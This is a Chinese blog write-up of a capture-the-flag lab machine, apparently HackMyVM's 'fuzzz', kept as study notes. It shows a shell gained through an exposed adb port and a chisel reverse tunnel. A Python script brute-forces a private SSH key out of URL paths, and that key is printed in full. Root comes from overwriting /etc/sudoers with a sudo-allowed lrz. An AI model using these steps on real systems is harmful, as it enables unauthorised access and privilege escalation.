guayu-kakeru
0%

HMV-fuzzz复现

发表于 更新于 分类于

这个靶机的难度虽然是low-easy,但是很多内容我没有想到,好久没也做靶机了,这是看群主视频的懦夫模式做的T_T
记录一下懦夫模式之后的复现

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[~]
└─# nmap 192.168.250.67 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-02 23:12 CST
Nmap scan report for bogon (192.168.250.67)
Host is up (0.00093s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5555/tcp open  freeciv
MAC Address: 00:0C:29:B8:32:24 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds

┌──(root㉿kali)-[~]
└─# nmap 192.168.250.67 -sV -p 5555
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-02 23:13 CST
Nmap scan report for bogon (192.168.250.67)
Host is up (0.0018s latency).

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge (token auth required)
MAC Address: 00:0C:29:B8:32:24 (VMware)
Service Info: OS: Android; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.17 seconds

这里扫出了一个平时不常见的端口5555 用-sV扫描版本 得到是adb服务
问了一下gpt这个adb是什么
Android 的远程管理工具,只要设备启用了 USB 调试就可以连接

提权

用adb connect 连接 然后用adb shell 可以开一个shell 但是这个shell不稳定还会自己断连,所以把自己公钥写进去然后ssh连接

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/tmp]
└─# adb connect 192.168.250.67:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.250.67:5555

┌──(root㉿kali)-[~/tmp]
└─# adb shell
/ $ id
uid=1000(runner) gid=1000(runner) groups=1000(runner)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root㉿kali)-[~/tmp]
└─# adb shell
/ $ cd
~ $ ls
~ $ ls -al
total 8
drwx------    2 runner   runner        4096 May 19 09:08 .
drwxr-xr-x    4 root     root          4096 May 19 10:02 ..
lrwxrwxrwx    1 root     runner           9 May 19 09:08 .ash_history -> /dev/null
~ $ cd /home
/home $ ls
asahi   runner
/home $ cd runner
~ $ ls -al
total 8
drwx------    2 runner   runner        4096 May 19 09:08 .
drwxr-xr-x    4 root     root          4096 May 19 10:02 ..
lrwxrwxrwx    1 root     runner           9 May 19 09:08 .ash_history -> /dev/null
~ $ mkdir .ssh
~ $ cd .ssh

~/.ssh $ exit

把公钥写到.ssh中的authorized_keys

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/tmp]
└─# ssh runner@192.168.250.67
The authenticity of host '192.168.250.67 (192.168.250.67)' can't be established.
ED25519 key fingerprint is SHA256:y+2KKHDaMy8FmNZpu0PMG4PJ+b1w5rQQScGZYvJj4L8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.250.67' (ED25519) to the list of known hosts.

fuzzz:~$ id
uid=1000(runner) gid=1000(runner) groups=1000(runner)

然后这个runner用户目录下没有东西,sudo -l 也需要密码 上传pspy64也没有什么定时任务
下一步用netstat -lntup 看看后台有没有运行什么服务 这里发现是有的 有一个80端口 

1
2
3
4
5
6
7
8
fuzzz:~$ netstat -lntup
netstat: showing only processes with your user ID
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:80            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:5555            0.0.0.0:*               LISTEN      4291/python3
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 :::22                   :::*                    LISTEN      -

下一步就是拉过来一个socat转发一下端口
这里不知道为什么我的静态编译的socat在这个shell里面不能运行,然后用chiel 这个还是很好用的
https://github.com/jpillora/chisel/releases 下载linux_adm64版本的

1
2
3
4
5
6
7
8
┌──(root㉿kali)-[~/tmp]
└─# ./chisel server -p 1234 --reverse
2025/09/08 17:36:05 server: Reverse tunnelling enabled
2025/09/08 17:36:05 server: Fingerprint sJnrFzp0p2DlaaIHEP3ZOubOvfaXbjMBw6IMNCMaKOc=
2025/09/08 17:36:05 server: Listening on http://0.0.0.0:1234

fuzzz:~$ chmod +x chisel
fuzzz:~$ ./chisel client 192.168.250.196:1234 R:8888:127.0.0.1:80

指令的意思是在kali上开启监听 反向连接 在1234端口开启服务
然后在靶机上运行客户端 连接到kali的1234端口 R代表远程模式 把靶机的80端口转发到kali的8888端口上面
用gobuster扫描发现有很多line 猜测后面还有lin3 line4等等

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿kali)-[~/tmp]
└─# gobuster dir  -u http://127.0.0.1:8888 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt  -x php,txt,html,jpg,png,xml,zip,js -r
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://127.0.0.1:8888
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,jpg,png,xml,zip,js
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/line                 (Status: 200) [Size: 0]
/line2                (Status: 200) [Size: 0]
/line1                (Status: 200) [Size: 0]
Progress: 47956 / 1868796 (2.57%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 47972 / 1868796 (2.57%)
===============================================================
Finished
===============================================================

继续扫描line1的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[~/tmp]
└─# gobuster dir  -u http://127.0.0.1:8888/line1 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt  -x php,txt,html,jpg,png,xml,zip,js -r
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://127.0.0.1:8888/line1
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,jpg,png,xml,zip,js
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/b                    (Status: 200) [Size: 0]
/b3                   (Status: 200) [Size: 0]
Progress: 25930 / 1868796 (1.39%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 25951 / 1868796 (1.39%)
===============================================================
Finished
===============================================================

这里出现了b3 由于我是懦夫模式,知道了这个就是id_rsa的开头,以后要对这个感到敏感了
所以这个靶机就是把私钥内容放在目录里面了 每个line就是每行的内容
先写一个脚本看看有多少行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import requests

base_url = "http://127.0.0.1:8888"
max_line = 50

def find_lines():
    print(f"[*] 开始检测总行数")

    line = 1
    while line < max_line:
        url = f"{base_url}/line{line}"
        response = requests.head(url,timeout=5,allow_redirects=True)

        if response.status_code == 200:
            print(f"[+]发现新行数 line{line}")
            line += 1
        elif response.status_code == 404:
            totle_line = line - 1
            print(f"共发现行数{totle_line}")
            return totle_line
        else:
            print(f"意外状态码: {response.status_code}")
            return -1

if __name__ == "__main__":
    find_lines()

运行之后知道一共有5行
然后再写个脚本获取每行的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
import string

charset = string.ascii_letters + string.digits + "+/=-"
base_url = "http://127.0.0.1:8888/"

def brute_rsa():
    id_rsa = [] # 存储最终恢复的每行

    for line_num in range(1,6):
        print(f"[*]正在爆破第{line_num}行")

        current = ""
        while True: # 直到找不到字符说明这行结束了
            found = False
            for char in charset:
                path = current + char
                url = f"{base_url}line{line_num}/{path}"
                response = requests.head(url,timeout=5,allow_redirects= True)

                if response.status_code == 200:
                    current += char
                    print(f"[+]current_line:{current}")
                    found = True
                    break # 找到了一个就跳出内层循环
            if not found :
                print()
                break # 如果内层循环都找完了, 说明这行已经找完了
        id_rsa.append(current)
    print("[*]爆破完成")
    print("\n".join(id_rsa))

if __name__ == "__main__":
    brute_rsa()
1
2
3
4
5
6
[*]爆破完成
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=

然后拼接上私钥的开头和结尾 拿到id_rsa

1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~/tmp]
└─# cat id_rsa1
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=
-----END OPENSSH PRIVATE KEY-----

然后成功进入asahi用户

1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~/tmp]
└─# chmod 600 id_rsa1

┌──(root㉿kali)-[~/tmp]
└─# ssh asahi@192.168.250.67 -i id_rsa1

fuzzz:~$ id
uid=1001(asahi) gid=1001(asahi) groups=1001(asahi)
fuzzz:~$

输入sudo -l 发现lrz有sudo权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
fuzzz:~$ sudo -l
Matching Defaults entries for asahi on fuzzz:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asahi:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User asahi may run the following commands on fuzzz:
    (ALL) NOPASSWD: /usr/local/bin/lrz
fuzzz:~$ /usr/local/bin/lrz -h
lrz version 0.12.21rc
Usage: lrz [options] [filename.if.xmodem]
Receive files with ZMODEM/YMODEM/XMODEM protocol
    (X) = option applies to XMODEM only
    (Y) = option applies to YMODEM only
    (Z) = option applies to ZMODEM only
  -+, --append                append to existing files
  -a, --ascii                 ASCII transfer (change CR/LF to LF)
  -b, --binary                binary transfer
  -B, --bufsize N             buffer N bytes (N==auto: buffer whole file)
  -c, --with-crc              Use 16 bit CRC (X)
  -C, --allow-remote-commands allow execution of remote commands (Z)
  -D, --null                  write all received data to /dev/null
      --delay-startup N       sleep N seconds before doing anything
  -e, --escape                Escape control characters (Z)
  -E, --rename                rename any files already existing
      --errors N              generate CRC error every N bytes (debugging)
  -h, --help                  Help, print this usage message
  -m, --min-bps N             stop transmission if BPS below N
  -M, --min-bps-time N          for at least N seconds (default: 120)
  -O, --disable-timeouts      disable timeout code, wait forever for data
      --o-sync                open output file(s) in synchronous write mode
  -p, --protect               protect existing files
  -q, --quiet                 quiet, no progress reports
  -r, --resume                try to resume interrupted file transfer (Z)
  -R, --restricted            restricted, more secure mode
  -s, --stop-at {HH:MM|+N}    stop transmission at HH:MM or in N seconds
  -S, --timesync              request remote time (twice: set local time)
      --syslog[=off]          turn syslog on or off, if possible
  -t, --timeout N             set timeout to N tenths of a second
      --tcp-server            open socket, wait for connection (Z)
      --tcp-client ADDR:PORT  open socket, connect to ... (Z)
  -u, --keep-uppercase        keep upper case filenames
  -U, --unrestrict            disable restricted mode (if allowed to)
  -v, --verbose               be verbose, provide debugging information
  -w, --windowsize N          Window is N bytes (Z)
  -X  --xmodem                use XMODEM protocol
  -y, --overwrite             Yes, clobber existing file if any
      --ymodem                use YMODEM protocol
  -Z, --zmodem                use ZMODEM protocol

short options use the same arguments as the long ones

lrz是一个文件上传的命令 然后看选项,发现-y是强制覆盖选项
所以写一个sodoers文件 在/etc目录下面开启这个服务

1
2
3
4
5
6
7
8
9
10
11
12
fuzzz:/etc$ sudo /usr/local/bin/lrz -y
fuzzz:/etc$ sudo -l
Matching Defaults entries for asahi on fuzzz:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asahi:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User asahi may run the following commands on fuzzz:
    (ALL) NOPASSWD: /usr/local/bin/lrz
    (ALL : ALL) NOPASSWD: ALL

这里我用的final shell 写命令后会让选择文件,上传之后就发现当前用户用所有权限了

1
2
3
fuzzz:/etc$ sudo su -
fuzzz:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

总结

  • 学习了adb是一个调试攻击 可以用adb shell 得到一个shell
  • 除了socat 学习chisel这个工具以及这里的端口转发用法 反向连接
  • 知道要对私钥的内容更加敏感 这里的b3B 就是id_rsa的开头
  • 提高脚本编写的能力
  • 最后用lrz的文件覆盖 用sudoers文件提权